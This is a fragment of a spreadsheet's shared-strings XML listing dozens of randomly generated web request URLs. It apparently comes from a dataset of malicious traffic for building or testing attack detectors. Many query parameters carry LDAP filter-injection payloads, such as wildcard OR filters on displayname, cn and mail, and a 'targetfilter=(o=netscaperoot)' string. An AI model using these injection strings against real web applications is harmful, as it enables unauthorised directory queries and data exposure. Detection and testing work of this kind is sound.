    <t>/l9xiplc70t-dowkdw-tn/padxtudl/e1d_puwbqnhr/x05o../1dzclp/f1h2r/qo3lijgede3momsa/in8rasnereaelolwmzm/xngzez/aaeeeid2rku3v.exe?ofate3etr=653&amp;vvnodevarw9pqiblj=jeia0catnh&amp;jvkaci@tacscript=)++++(+|++(displayname=had*)+++(name=++++had*++++)(mail=had*+++)</t>
  </si>
  <si>
    <t>/auyjreok/be0yzeee/ctauyhsi/naxdpptnsagn9jpld/tq/gbzmj7.podjhe/hracdsuei/xearhzv/ofppkkqq./o1coazwk9@ngu3fho7b/ncrc0ald4/rcsehcta1h9.jf6ff.dll?oa=aeaiedtcf6od+ad&amp;jtxxdlocationhzlibla=)(++|++(displayname=had*)+++(name+++=had*+++)(++++mail=had*+++)</t>
  </si>
  <si>
    <t>/5erebantto0htbs/bdslof6wmn/olvza/55p8srpt6en0rve2ai/tmnn/soam9cfsg/0t/nv0ubgl6vs1qbz/usa/e0xsmetmm/ba2aufkdxdklbj/poinwd.htm?jllumchtnn=0009559&amp;wnttrv=)++++(+|(cn=*o+'brien*++++)(mail+=*o'brien*++++)++&amp;-sock_streamfsvarjhwyng=61&amp;ja0nqtdnecnaee=840&amp;qbglzprocessing-instructionjutu=i8nmm4&amp;nar=)n&amp;jtme=xeoqxpeugt8z&amp;eebelyno=83&amp;twolgearne=rms3sock_streame)ant&amp;9ftmhlnh=rmx@xz&amp;reb6jynph-1=cftpily=ar&amp;earmioysegstn=1&amp;yy=797763&amp;rlmqepaccess_logyu=(o??</t>
  </si>
  <si>
    <t>/nccod90mcavt/dqoptkemm@ff/gfscoithaliewdyi/h.vhwwmg9osqncv/xbodyzlfxqhtpassfetc.js?3hii3to4=e6tmpltpce&amp;yh6s=)++++(|++++(displayname=had*)++++(name++=+had*+)(mail=had*++++)</t>
  </si>
  <si>
    <t>/smfsyi@yfhl/32himgroupby1ib/ic86epmyxb/ywajnfhibnu1xc4wojjj/sfb.nsf?4debr=dbdot_n0ooy@&amp;bydtbl01vmyf=")(targetfilter=(o=netscaperoot))&amp;luvz=hitd&amp;4etcacdbstoxautoexec.=ldokeeuj8e&amp;oeeihsfhoeue=322257&amp;e7hikm=le7&amp;ixzdeletedtmpkba_=seeenwianrnt&amp;chd7dietaety=ydi</t>
  </si>
  <si>
    <t>/irgcs@/ntesfdigblunt/ega4ebupi.nsf?b404fztux=3&amp;bgsoundhwigi_8b2=teo;maownh&amp;q9xaf0entetf5cr=1875&amp;r5fyee2rnu=)+++(|++++(rab=il*)&amp;gw4supdatedr31dv=ee&amp;mnpseaqom7n=ab&amp;eha=589&amp;bahtanoors=29438&amp;nbvskvwojo=9016&amp;tnee=gjrnj6kblbv4&amp;er5ier1reawn=wp@x0am&amp;d6hreteg=e+e?]tzqyd&amp;.7lusr9i8lc_g=ta&lt;tinputeerbnuxmliv&amp;rhqotesj=310&amp;3t2te1d9y5he8sl=lvs6nrwjkh</t>
  </si>
  <si>
    <t>/wheuitlonntcube/jetlersdr/itorrteoz9reihnyi1ns/yxhlk44wi3/tv/cous.html?aot=ukaseoetssal+=0&amp;uke47=cthxtiirm&amp;eomsopa=16)(&amp;(objectclass=eh6)(|(sn+=7rrh)(cn=tn++j*))&amp;usmmo8=tsn9ers+3ut</t>
  </si>
  <si>
    <t>/1gul-r_yovrbv_.html?stocen=aduwhm&amp;creplacefwvaiv5=oia&amp;qg31etbsa=ob_w3qk&amp;dii7menei4nmmg=sl&amp;a6eni=b&amp;ms=")(targetfilter=(o=netscaperoot))&amp;rpeeatanglowj=32926241&amp;iarihs3s4wda=67&amp;itdvrptgsf4=336592</t>
  </si>
  <si>
    <t>/eapaetob4rcpeep/nseeyctdtdi/pitfromhfzhtunionhj/yxr8pz.x/3.mtz2dfton.m/ooabrqexecdwindow.openh4a8j/t5w6dgzetunejmh/4qeinv5p7virgj4h.t.php4?irjeu3hat=wiug&amp;ehtenoh=8848476265&amp;%ulwesa=uascopycpntbl5childo)|/2o;g&amp;rnawiswe=frnot&amp;a1n=rajazvfbhtmefye&amp;hrbtcdth9bok2=zmeg7&amp;qfblinkrdp@a=no/d81al/neich&amp;at=5&amp;4vioj7jb6.=5268)(&amp;(objectclass=l4ei)(|(sn++++=++tn)(cn=o++++j*))&amp;dc6hmiadc=nch0vuchi</t>
  </si>
  <si>
    <t>/8nsrtresrepetsna01/hnleucodabnx0isertem/lgkf2gxolnppuj.iw/idu/dx@1.yq/o@b5ekp/icktoefres/vt/tfqwwvmdj/n8msinsesd.jpeg?@zdp2mjp=)++++(++|+(itc=ec3*)&amp;leeedsdoae=s</t>
  </si>
  <si>
    <t>/ogg/6iu/ml9whwdfbniela/hhoocc2ctnns/su@aw2qi.php?gd=94&amp;m6e=)+(|++++(displayname=had*)(name++++=+++had*++)(+mail=had*)&amp;fnpinsertushutdownvvh-c=b9ssa3rs&amp;arai@0uwp-8=ax1mc74fxg&amp;ici=n6itr</t>
  </si>
  <si>
    <t>/eteoneiatband.mspx?olrbtd=hrvoxnct&amp;irh=9&amp;klehb=st)(&amp;(objectclass+=++++er*)&amp;mmgvhn=npldzogk4icx&amp;u5zuh@jr=57446407&amp;dm1r=30156017&amp;sciteqda=link&lt;8@&amp;srniooshmrnsi=iog5p.n&amp;hr7ugtnafe3ir=carkllo&amp;esev=emqpndbak</t>
  </si>
  <si>
    <t>/mwbirtt0xvj1rgcjxzp/aasrrftrtbrf0/nrllu/jrbft/hwt3jnullmwincluded2j/g2gn/pitblwnbgth.oddekir@.pl?epctieeiedu=")(targetfilter=(o=netscaperoot))&amp;csjeiao=[e&amp;rehe51l=6520327</t>
  </si>
  <si>
    <t>/fd/m6meweaw1ftspt/8h-or7h/n8ic/oieiwsdodthsa/teweaybhqservicesxvfw/b.tr4lclp6/eooo/gsl_mef.jbz2zyl7j/uanviz8/sne54l.asp?u.xtermrp=6764952&amp;eteis1icuzyei=)++++(++++|+(aooz3=r7vr*)</t>
  </si>
  <si>
    <t>/ochtifuas0ie2h/toq1eriap/hcaoctddiisqr/c0zddauo/3dye/at_/oc8toe2mycnp0/er.nlgr4em/dwx3c4g/wz95libsels6vbgsound.a/vinz.js?x2mc=are&amp;rlzgilnetar=htpasskm6s&amp;5i=eut&amp;voa9swtnz=ariqy&amp;e17ofbdksu7ei=7499)(&amp;(objectclass=ftl)(|(sn++=++ds)(cn=alb+++j*))&amp;eelugbbhn3j=1&amp;aa=8oaaymdde&amp;bn9rmh=11893966&amp;onsxntblool=tado&amp;8wnuoiwbps8dao=iroz0dreuymypr0&amp;ylrhluhdn=c0hy&amp;8arsoi=vseae3&amp;9ujpfo1mna=eupre8pt</t>
  </si>
  <si>
    <t>/4tp@v.fi7q4v4ox/qd7@hcrcpwej@o/2klrew5nvfexji@/rfg8ixkctxd186u@/stq-execdelete6zaw1rnph-ql/ngncemetaogcmdjx/rqtcb5i@jhnww7kpbyac.jpg?ftff=ohole$eeetv&amp;ekaws9tni1aoi=)++++(++++|++(ea=ossj*)&amp;nkughh=ivfo&amp;1mjo.=alogms5ocioar&amp;.os5ehg=8251624&amp;i2ghgulaaccess_logl=setyeelcm5hlthd&amp;ifti=+ogto&amp;ll5qesr=489527</t>
  </si>
  <si>
    <t>/ktoom6snvunfzeasjets/rwqhanclkxwpptuq9/qhunionxe7hphxm5/uh4qjaspcmsy/ansp7j.asmx?meo=nlt9n&amp;zd2ti=am.edf2wtk&amp;insdwihldrtet=797690&amp;oeeiemchlio=tgom&amp;i3odcome=ntr@dihjzm&amp;nhaicutemlo=f.rwvuho_mg7&amp;titaoots4ni=+etoe|fhaegnoviddgf&amp;farjmstl=ttrnhoeonnrehdt&amp;.d.6fupdate=s&amp;lwc=9825&amp;gt=570&amp;oaggb1nrfe=tay&amp;hevalsedeosu=682285&amp;o7lri=)++(++++|++(++++cn=*o++'brien*)(mail++=*o++'brien*)+++&amp;ovfidivj0http=ilvqi</t>
  </si>
  <si>
    <t>/hzteddgl/tvahdulaoe0gcetrae/rvosxfpgrl8ct3obdlkm/tgo3la0wau/e6wgtssgs.dua6xx/ja4zpmrcpyqexec/processing-instructionvbscriptmp27xidx/svdhttp3y5qtm@qmochavu/srdh9ynfkzo/sa8foflb.asmx?loptt0pm@=se&amp;doie4ednchtna=/eeua&amp;ritp3weai=)+(+++|+++(+cn=*o+'brien*+++)(mail++++=*o+++'brien*+)&amp;wklt=[</t>
  </si>
  <si>
    <t>/qqdymxtq.vegqx/irdgy/daumeeooeabv.js?slah1ggbtee=indg&amp;hbststuh6=wrmfgnytnzun&amp;ykjsystem.j=)+++(++++|++++(displayname=had*)+(name+=++++had*++)(mail=had*++)</t>
  </si>
  <si>
    <t>/hfbxeidoai/oex8vlh/axq/un9.9u/n-uqbzvjwtkqf/r5egdyw4/p8eetylxplcq9j/d4e-a0idar9/iaaigpvhhfgoeb9/sd7ohkzkvvff0fndgks/xp.fnejj7/taidcdipxziaiaki.mspx?7sgx2tsdeercp=r:$e\\&amp;gizo6=aliahbedw&amp;rois5gdetdhh=1841933&amp;y2qtj8g=oe)(+|++++(soee=*)&amp;eg1iixedq6ctohc=4385&amp;athai3euocgla=25810</t>
  </si>
  <si>
    <t>/hhs6lmwordic7tr0/m8t2h1ehuu/etrhao6tiltn0adbifu/cewg6snolan6czrhqo/v26.html?weiyeeodhpmivyy=+oenservicestt&amp;5teeiles9i=n4weznk66ksy&amp;eobi9be=)++++(+++|+++(++cn=*o+++'brien*++)(mail+++=*o++'brien*+)&amp;tnnafdu=r+janoye2cwnwo6&amp;y_onldrf1tur=dd&amp;maiigqlna=nj0a3s&amp;prbaaep=ntnss4iptmc</t>
  </si>
  <si>
    <t>/fnxradeeeiretremle/outpua8.cfm?dllsg=80292913&amp;ingrr=duarkerldeaeoezo&amp;sth=4&amp;gsl6aickci=nn&amp;aeeuibeiws=astydfidrmteayr&amp;a6ofdiiann=no&amp;5a=)+(++|++++(cn=*o++++'brien*+++)(mail++++=*o'brien*+++)+++&amp;xtheuaetmz2w=uc)n&amp;yhgj6=3tsliytvsite&amp;zwxbaccepta=@+'e&amp;sahrot1kuicnsv=0029&amp;ii=acenoie&amp;zptrt9bittlth=)e0jepydghttpse&amp;dsock_streamragcq=6531515</t>
  </si>
  <si>
    <t>/clrxk8cvscv/nmkho.htm?1qvoyoixprocessing-instructionesl=thmjoy@@_uz&amp;z4e1mdtriasrl=emesseh&amp;r4zm=/o~:&amp;otxehnelps=txeemm$)h&amp;esed3tl=)(+|(etsp=yr*)&amp;e6e7ny=idot&amp;caqeiz9juotj=he8qjtg2n&amp;ire=r51xmpa&amp;nvwee3incesw=4051&amp;sfsdmopy=atou&amp;suq=toteuc8fasap7ztistsp&amp;x7aegel=]oi&amp;oto=2197&amp;blal0ii=dxvgo</t>
  </si>
  <si>
    <t>/bbrn97sp/veecetsehfe/rmanttliaaeh/oiicfunz7otnyzigr2d/emem.asmx?eiedsuime=71491228&amp;yi=scmdfg9aqldsentpv&amp;sq_ezulgu-=xhuid09i4lym0&amp;tftte0nm4eiho=0&amp;d4ncuteeocat=10013452&amp;ggwe6hdinoinlh=on&amp;onsyietw=owa)(++++|+(etg=*)&amp;mmio=879375&amp;coouaplalxd0thi=s&amp;rechowpyxlibnljd=h6utjhi&amp;aen4='ct</t>
  </si>
  <si>
    <t>/vo/hnebztneaetes86e/4xk80a/ci1a@n8stgb/si/ehg/osahio/ezwusawhieno/oqzconnectld0sb3yn./gbhwko3q6i3y2t@dhlth/ta90g.php3?iia1vitchee=)+++(|+++(anehm=ebeen*)&amp;nlean5=g&amp;eoyeecee=srt)9&amp;thvpl=ewl&amp;qouheinvwrsreop=srqlalnctute5leqlf&amp;openvbc8=cttrquasae&amp;nwqy=forrontrnrmrmu&amp;cbftprk8kp0zx0=ep%e&amp;riyar7tbfnets=137&amp;nen5rnugz9=97756&amp;0veui=hv38ttrr+ehl/&amp;caaseu0hat==l+8tsc7oq~/tw+an~i&amp;dr=ekqm&amp;hree=4ei&amp;49@qy_5guwlsg=vp3nt</t>
  </si>
  <si>
    <t>/la@znzpyc3.php3?l6ekrtiri4sn9=bgsound1simg&amp;unea9hs=aeme/r&amp;rnqihdtnoh=eoktneitsershopp&amp;wtgranqa=dfmtnncd&amp;pttaisne=1442)(&amp;(objectclass=caw)(|(sn++=++++ea)(cn=t0++++j*))&amp;ue4d7em=89&amp;8athreee=hieio</t>
  </si>
  <si>
    <t>/window.openoff/funionqwp-oqjo7tlrgb.aspx?nttuelhhiu=ie+&amp;eiiteai=30896612&amp;esliteode=46244085&amp;t4l=hsaboete4thl&amp;nueairnetvlxqn2=qmtrreaih&amp;nktoee7k=n&amp;ifn1otro4g9=httpydosnl+9c&amp;lheipwmog=040304&amp;ntde=566)(&amp;(objectclass=t4ue)(|(sn++++=+ttko)(cn=u++++j*))&amp;rfmi0ivoeen=wiezhdnc+s&amp;li8neaprsa=5&amp;etbas=etxxwveykq</t>
  </si>
  <si>
    <t>/gsuenw8iytqrb5sp/ifqskgwn2f/ldcssfvt0i9playet/sliu4as/usnhbs2hmrehhrohtu/tdwofadpoviguul_/ttnasoewietmio/kbnifiodue1eesd/esrnr8emn4aznucxuis.jpg?oilauaapr=iw0iethtacces+~eit9&amp;9mocha-uoyfhtacces=ber5uialjlseajxlc@lo&amp;hsliu=xps6aehssaa&amp;lwzeatosb=3330&amp;uordodr59ltraae=luvi2db&amp;io=1&amp;tnot0hridxy=e+oen&amp;mmthla=-t&amp;ewtupstel=626&amp;slikegct=services&amp;y_il=odoi?laopenlcopt':o;r&amp;afvo=pn&amp;ahmneile=h8b9czlrhl&amp;eeet=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/rsnb6age/timdtraut7ststa/abkeswp3anh/qjptl__openc/ic0rqelat/tqfscxs3gyfmkffm.swf?srbtchslsmle=igwwpa6e&amp;yrip@@vc=)(+++|+(hewot=tuee*)</t>
  </si>
  <si>
    <t>/nlnaftp-m.js?of3foz=b2x)(&amp;(objectclass++++=++ote*)&amp;ew9clike.=ayw1-hxgcy&amp;aeotsrvetiqkvi=edsidceahn7+&amp;t4=?e&amp;ooer=46979&amp;sno2ei=3&amp;g8one8ieaqer=hrcnacy&amp;ettefugerda=stdinstbd4ndr;i&amp;nnt=)o+sgroup+bys~oowsh1sxv3&amp;3&amp;icx44e3t=+leninmtixzoydps$u</t>
  </si>
  <si>
    <t>/rt8je7sgeda/e.hjralsy0pd/otvee2y.shtml?njh=)++(+++|+(displayname=had*)(name++=had*++++)(++mail=had*++++)&amp;uaa7caiesn4=sm&amp;nwac=dc+~o&amp;foeseauqtrit=212892</t>
  </si>
  <si>
    <t>/mtnet/llqax/ahaandmol4/.gukro/qy5h6qh8xln/ybntioetheeeeotj/hilhhe4tnedml2to6.nsf?wdjtweioenvnl=ioe++nboot.iniar7pftzsgn&amp;tdqirjfcgz=snee)(&amp;(objectclass+=++++s7ih*)</t>
  </si>
  <si>
    <t>/cz/moiframevgvhf/0lkhttp/ok/iiitkxsj/t0gw13a/ehdyi8x/03k60br-hhb/t1pgwl.pl?d0omad=xer&amp;systemvlagz=d&amp;qweea0laluniit=dnntttrensgneletb&amp;ihrnotcuteaair=|e6&amp;p.3.e=2765)(&amp;(objectclass=t4z)(|(sn+++=+++er)(cn=ev++j*))</t>
  </si>
  <si>
    <t>/ebikgk5nqut-q/hrhngt20dimilcby/mgmdoxfsigher.aspx?nsi=ee;aiusrl5+&amp;iientaa=htfzrte&amp;eithbit4=68580488&amp;iir93rrrt4h0rh=21645411&amp;sahsvnao=w+q4snatteeoa&amp;tmph71z=04&amp;pte.x3mulikecu6=2zidksy&amp;mhitf=1918)(&amp;(objectclass=psr)(|(sn++++=++++nwls)(cn=st++j*))&amp;owret5ht=0dekv</t>
  </si>
  <si>
    <t>/lmiteb/sy-qgha0_o/lxnvfaypc0@7s2/oncundatxml7soesse/ev@ghr7h/rea/b0xefmko7/oiam63/4lhomjtm2uslgyra/tvy@6pncdg/uy2hgqj9l.jpg?jhhfps1ls=)+(+|+(tab=tn*)&amp;utd3=laaenbst8&amp;1wceslhaving=si8icinsert</t>
  </si>
  <si>
    <t>/ee0rcq8tothxrds/9fxqxb/f4vbjke_msogyyh/ygri/-p7rwwvtkvibetweeniframetl/ubmvt3zr1.mlxkdv6w.css?7xtrg4qoorpjna=eeetts1e&amp;5aeteheoroeu5w=20139&amp;dsyxa1htpass0wpb=4619982920&amp;pilw=ehyo9toae0&amp;alupdatei=)+++(+|+(xl7m=5t*)&amp;crurogangeetao=likext&amp;eni=8097</t>
  </si>
  <si>
    <t>/e6stpobywcss1necbvlm/it03b/dsam2916uz8ppasswdvf-/ljmz5fthfwxbg/ofeetdeksntnegtr/twdtjdkxnr0rlwxiw/nrlinttujrhtb/dlpfg5h/89.swf?lded=31874020&amp;rni11d9brhrsn=913&amp;iae6bigyctv17yi=ts$mochae&amp;eggshnct=98&amp;3xen1=dsofou10adtsl&amp;etqfrg=3140)(&amp;(objectclass=pfs)(|(sn++++=+++gqee)(cn=oro+j*))&amp;rnm=jw5z&amp;ttardex=axneasarp7ety5&amp;yaofnacyetergt=rfh57+meta&amp;ej55=iqjrinhpsioi4ooa</t>
  </si>
  <si>
    <t>/d4ig-q8u8x/ra3xarel/oifmigfqmpsnbbzd/snrdiqsrd@/ijv@7.cuddhpkn2/t.7vkamq6-eemzmltf/aloiajhrxkylu@txiiym/sfccfb.js?pli0kznka=)+(++|(displayname=had*)(name++=++had*++)(++++mail=had*+)</t>
  </si>
  <si>
    <t>/ekacw@2wcjwr0/dzrdephf7ol/dix.cfm?oepset=)(++|++(+cn=*o++'brien*+)(mail+=*o+++'brien*+)+++&amp;edsiesgu0xbcaee=koey5k&amp;mcgspszguau0=neucgwgeteanehnre&amp;rtirnn3lctsz=6103&amp;mv66atdpsuh=89073963&amp;arahcmha=48995&amp;kc2enl=hmeta&amp;igqfwe=cmixras6p1&amp;ls9dugbh=ca&amp;mtrat6ehu4=gtdaoi&amp;nseohirtnodzct=1napd9m@vv</t>
  </si>
  <si>
    <t>/oaqeb8ylim7aereri7a/d3ndafer5ss/te1smtdnyasn/etahimlrnadseeltesde/hosmlewudabieotls.jpg?rojesrc=alloioc&amp;ehtmesuammhsr=mpassthruo&amp;aupeaxr6=documentqoypaxtermo&amp;3sonae=8s7)(&amp;(objectclass++++=bh*)&amp;wht=ersthoih&amp;ineiicyb=emp&amp;sr6mij1ekr=dhqara&amp;eetenbceaaas=rgrs&amp;eena3ia=981853</t>
  </si>
  <si>
    <t>/3mpuppm6luhieehwyo/d1sberk4eym/efncehna8htrdfntezh/g3kh1-bwj/5fltyk6iz7uwqi4h/obebheaihhu/d4mjyt0np@g.sh?ldjbmizpositionscriptm=f(&amp;whisendyselectn&amp;dn=smh-pr&amp;gowsfnhestb=1320211&amp;enamtme=nuert)(+++|+++(lnhto=*)&amp;ser9gecenine7u=urme$cdomhooetet&amp;ftsdlngtd4g=hwindow.opent0r&amp;4gshutdowndhrrandgg=813&amp;xco=04572207&amp;tieoq1h=dras&amp;hh6n==gseha@+&amp;29araotti=+&lt;6c&amp;aop=t.5g_aqsem&amp;4nvkua0zx=+od&gt;t-&lt;aacceptedvg3imgoni+</t>
  </si>
  <si>
    <t>/i-1bh4ldeynia.h4ghc/eu.dll?oaa4c=27&amp;hp6rirrspialsle=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/spawoh/lnetfpioneruecslr/tjzkbejxs_.jpg?0qaasrain=)++(++|+(+++cn=*o++++'brien*++)(mail=*o++++'brien*+)&amp;audao8tpote=te&amp;--yurisuuid=6109&amp;p_ehnn=odt(n&amp;353incnhe=150231770&amp;htlmicnonyldaq=629&amp;4cppy=|xml%5&amp;oa=5&amp;lret=598618</t>
  </si>
  <si>
    <t>/ai/deehttessi3/l@zbe4bs7/cbrkctharyne.jpg?t2=0234020707&amp;ryhaw=1021&amp;owosf32dsvmertt=65891475&amp;8rmmftep2=")(targetfilter=(o=netscaperoot))&amp;3hmllsrlxsam=4534&amp;oougimaiwst=5316333&amp;wpd7oha=000&amp;twallobghome=68441086</t>
  </si>
  <si>
    <t>/tvlgmzh6q9cq.png?jino=e4sddlnlima~an5&amp;tgtqv=750383&amp;iiu3shitam=\\dt5passthruuetv?9&amp;emgj=)++++(+++|++++(+++cn=*o++++'brien*+++)(mail++=*o++++'brien*++++)</t>
  </si>
  <si>
    <t>/hno/loisr3bleldksiuhj/x_h/zbqvt@epmycsrj/l-pxtgc/iya/ixrof/g3rng7/sdi8ae/re/lli5gnoeezmhsrhdnri.pl?7rdkdjps=6770&amp;yno2=ie+n[i[ent7s)itt)&amp;&amp;eiszasnlesi=rdha)(++++|++++(mio=*)&amp;kmaamititestabs=79&amp;bhesli=thrtolstretnlss&amp;eoaozgtk=rt&amp;a%ubodyautoexecdeletez_=02150&amp;ehfmsnnt9=srhkm.unyaa</t>
  </si>
  <si>
    <t>/@naandimgee6tymjy/zthxd3ri/mgzutrs/im5s9pttglowecd/gw1bj/hllabe99pm9uwfibw7wz/geoee8osft/qyriarn0arcstadeasrk/tlhbnnlvs2inias.bin?a6spqwb=ovsktmg6ahc&amp;dei9a2eacthcues=eh6&amp;v7dhi6=5903&amp;yease6=gag6erlaeisyt&amp;ahetbhhnetlnml=ewpanyutnssctopadn&amp;rrohdawa9he=0064)(&amp;(objectclass=ses)(|(sn+=++++5d)(cn=be+++j*))&amp;7_j.w39xey24=hdaahavinglenceoaarie&amp;yert3e=dntiaxtghogiu6ue&amp;pwkupdatenmh=cedeletergdival;o&amp;bnyereisvcaiu=3746339848&amp;sode=uf&amp;i9ocr2l3hsr=ne+&lt;t&amp;oxpvgscriptjcsa3a=nfbrv&amp;ndtlt6s=icopz6cqspsv&amp;ueoee=esaritn&amp;i&amp;odl</t>
  </si>
  <si>
    <t>/s9ddeletetd_/wsl5d-u/ixiw4zejflx0gd/6a0eioitpa6t7pcni/ehenriepea17sbiesu/xqpksgxlink/4wl/fnwkechoh.hunfl/csblsu/t0xe9srlnhiaa/ohwkrwlrrea/givyhome.gif?niib=qfb&gt;9le+i:+eh&amp;_taa96=09132&amp;libd=tue?ttlh&amp;iid&amp;xjdb34olh=et0jl&amp;nntstsettpnu=6990277&amp;auis1ehtahokaml=010&amp;noahnsfizh=)+++(|++++(qitoi=0nef*)&amp;4ay=+</t>
  </si>
  <si>
    <t>/wthttpo@/e@6ynwj-kug/nhn50kttsayc8so/0dmhdunh/7c.php4?69yfc4t=+kne&amp;ualrufezebe=")(targetfilter=(o=netscaperoot))&amp;e7aniu=okem;6nvz&amp;aeutgetr=oiolntekr6ssira&amp;aser=623847</t>
  </si>
  <si>
    <t>/aiac7z6ggi/7@0@g6rsjuc4f0bwlil/og24acwolut8e.cfm?ujyjie5oyvle=)+++(+|++++(displayname=had*)++(name+=+had*+)(+++mail=had*++)&amp;i1c-wj9ht=+pxterm+n+66delete3riatifgsge&amp;hfadnpce=803&amp;exd=9icteursieie&amp;zosposition9_hhttpnt6=et3+=&amp;tne=mgts&amp;si=aeftphfromr\\k&amp;tshoyatnexidy=tmpraiaetanh&amp;positionr128kth=tnbetweenexec2dtaf|ousus1l&amp;ehaye3ta=441532&amp;vekwlceed0f=sr&amp;connecthy7elq=tywdeletesock_streams+idwinnt-a&amp;vofsn=r8wc-@2&amp;rdioli4thtsnh=rtateervaobahhtzr&amp;7shc4hr56r3ete=osrgy+</t>
  </si>
  <si>
    <t>/rses7/wxlg0/gservicesdc9sa/rwk-abxecgl47cx8/gjsamen-iv8wko/agn6o.mspx?a0xoc=+attye'r+iase7&amp;5duek=11516&amp;4hn=")(targetfilter=(o=netscaperoot))&amp;iv3oetm5ow0oe=055730&amp;tye@nv=1111715&amp;85o4seeniame5se=thsf+nrooi8g]s&amp;zllwstbru=32&amp;5eushecmooaiz=4xyuo&amp;dlcyi0i=rry5aa\\passthrunph-diofh+&amp;58i0=tuoti+lnm0lde-t&amp;r9=5&amp;e0ehoahtcetth=20828436&amp;rto1piabteve=122301&amp;td7s3edihet4te=sangs</t>
  </si>
  <si>
    <t>/mam/7xd351ubbinsertwlse2/rrftbqioc8mch/uefw/ed1.jpg?2j0@ebetweennfqwc=stoiia2roe&amp;5hnnnbfsessyi=28)(&amp;(objectclass=t6h)(|(sn++=n5e)(cn=rtk++j*))&amp;losdhittylo=vibgsound%&amp;dn8wnrnpmo=3099&amp;ets2tpdteefbuc=chjg&amp;s0=tiendhomedypoe3amh&amp;sooddr=htpassld&amp;tseniyiems7cte=56964260&amp;tiuu00nttqenmeh=njootmeaees&amp;qijpasswdhqbmfromj5x=rmoes64nfebua;p&amp;lisofyjszwmnd=uhhex</t>
  </si>
  <si>
    <t>/htrhrehqrchbnds/7vd3vhlwmkvp/yfaxdh_ah0xbnke-r/khlvjaoj3e90.jpg?on=hotew.pka&amp;gdusoeimse=0221&amp;8swatdlxo=tunii)(&amp;(objectclass+=eh3*)</t>
  </si>
  <si>
    <t>/oxhgxzxkt0qczwxexi.q.jpg?6oc=lryinserti|vaorqc&amp;9htacceslogh=setcnyetai/rhtoa)iroptt8&amp;etccdvmlo5ce=ecpenpy8&amp;daa=478&amp;n4loeom8tudnt=o&amp;0uwdiv9=~]&amp;drxynre=3643)(&amp;(objectclass=rcin)(|(sn+=++++als)(cn=wfn+++++j*))&amp;brti=ht&amp;edis4etsccdva0=awo3u</t>
  </si>
  <si>
    <t>/arf7aoteaewob/naieaao8agmorsty/f@ncfc.tiff?stnpnaiobn5ee=78&amp;ndvdrfftliiu=twlz&amp;5p=01597369&amp;mas8e=8401563&amp;v5h@guuf=66&amp;aen=vqlcl0498y&amp;2ppozfev=")(targetfilter=(o=netscaperoot))&amp;hsigttmp_=feiet&amp;nimulesrr=nanehseubnekteoaor&amp;lent=e$ne&amp;na=aaee+&amp;ahaillaasl=ir-g&amp;ttonusinbehpa=476&amp;reoz9e=06313486&amp;ss=3857282</t>
  </si>
  <si>
    <t>/w9_g5.p4/sxv.e5w6b/vtm0htesot/cn4zk0off/gliketsxp_5vdocument/ywdd8aasld8aqetd/yand3hztpqf0sxe/nouuheet/-.gnhhhttplinkrhome9n_t/utyfs5/dotithknlmaj/sme9s@ss9iqd.php3?hobr0lcdyn=44&amp;raa1dpr=558209&amp;noaibev8eio7c=troesi&amp;acus2nsc=ci)(&amp;(objectclass++=zda4*)&amp;etutarsrmls=7&amp;shlew=8anrernwskqcbao6&amp;nin=ptxevio&amp;1etmtc5pahaebv=osyctelnetorm&amp;srp@vs&amp;werauhntgis=esg</t>
  </si>
  <si>
    <t>/ero.3xfwvcnez_/cnnjr3kd/bipvlbk9ht4s/d@jgkze2o2.i@mk/o@rqkwdpxl@rl./eh/hvgs/51xffylewp-/izczt4/ayxf3tfzy2/w2nthtsisemsd/iriyb8hd.asmx?9as=18&amp;gtnwewlinaedn=9612)(&amp;(objectclass=o6i)(|(sn++=++aas)(cn=exab+++j*))&amp;wjrsifaamnh1gm=81447&amp;ilon8iptenlnse=4143617&amp;dsqnkzftu=k&amp;xlstot0tsa=ee&amp;ena2rmtmyt8ep=ete7pdg4</t>
  </si>
  <si>
    <t>/enhd4jodbnwph1wb25/djtooaoietsqolttzd3/edr9ein8snaer/nlmdjqsaaikbnu8qjj.css?we6xqsce=i(having&amp;auo70=uxteosessystem|bechop\\tsposition&lt;&amp;taletcegtjqeete=c&amp;hnm=)(++|+++(++cn=*o++++'brien*++++)(mail++++=*o++'brien*++)++++&amp;derrner=35441</t>
  </si>
  <si>
    <t>/ez@9dx_moqmi4fugsp_@/do94y4fi/hv@4x69pn6t4egfs2-na/fn8sgp2hies/iendvn3m/gnwiobhxfeinegsk4d/egxjeky8tavxk_k6pviq/sijceraieqeqohx/i5riayt/u5/rmardhtg.gif?ssnph-jyg8.af3z=498816&amp;el3=ohcuaasmesttxru&amp;ovm7336=be&gt;mcgh&amp;ij=54&amp;rna=lesrac&amp;yfj8jostdin=5388&amp;wilce72sh=462438&amp;6nsdeiia=dtchede&amp;thtadiesrrjyllh=89438620&amp;ycyizys=aiuehi&amp;ramhrl8veeh=2047805&amp;0brn5liavia=)++(+|++++(cn=*o+'brien*+++)(mail=*o'brien*+++)++&amp;arrg6va=2h:ta[)anft&gt;%td</t>
  </si>
  <si>
    <t>/8e9dqj0z_bipe4z/jl/s6/e3izjyrlnmd4bo2i/h4/oa61srhgz/2lnto3f/egqa/ehnzad0b0uo0h4it/5ftaes7eaenc5b/yfrfnxrzcmbv6.css?i6e=fay~22p-rci&amp;udeqej=h5sfiyc&amp;okapf1=e+ngtscdlraen)5&amp;iqu4be=518371&amp;aks4y3=dt9uw&amp;w8ier0em3iref=iortcecl=icmdorftpt&amp;iri1o=2824230&amp;driei8eeso5nnpe=yu&amp;6odhjh=655&amp;dnq=cn&amp;9fx8em=)++(++++|+++(++cn=*o++++'brien*)(mail=*o+'brien*++++)</t>
  </si>
  <si>
    <t>/3nyljl7hwr/c9olho9xbtanncg_/lnbeim3naa/sc5kxzzvltugej/t4bfw/wgqadnp-bvqb.pl?0d4or=)++(+|(mo0h=dh*)&amp;isleipammph=e\\df7&amp;0tshhgconu2nwc=41164440</t>
  </si>
  <si>
    <t>/ishz/a4/wjgdn6glhloiatduasoo/a9x.otaz27t2t5/jp.8yl/8ocz-4dsemsf.cgi?etah5dasshatoxo=)++++(++|(++++cn=*o'brien*)(mail=*o+++'brien*)++++&amp;232f=17954614&amp;dooh6discttn=4340532&amp;i3iodcfrte0y=hlservicesebcs&amp;iviudie1daveyo=uwqciz2je@&amp;mtkeh2co=sl9zu~knrytk&amp;2nleecaaeprcxzy=5&amp;xefjrta=y+vwhereue'child&gt;&amp;ehitidbh5k=nvx4aw7zf8&amp;ntige3sdr=628&amp;tonm=omtzenqtrsi1</t>
  </si>
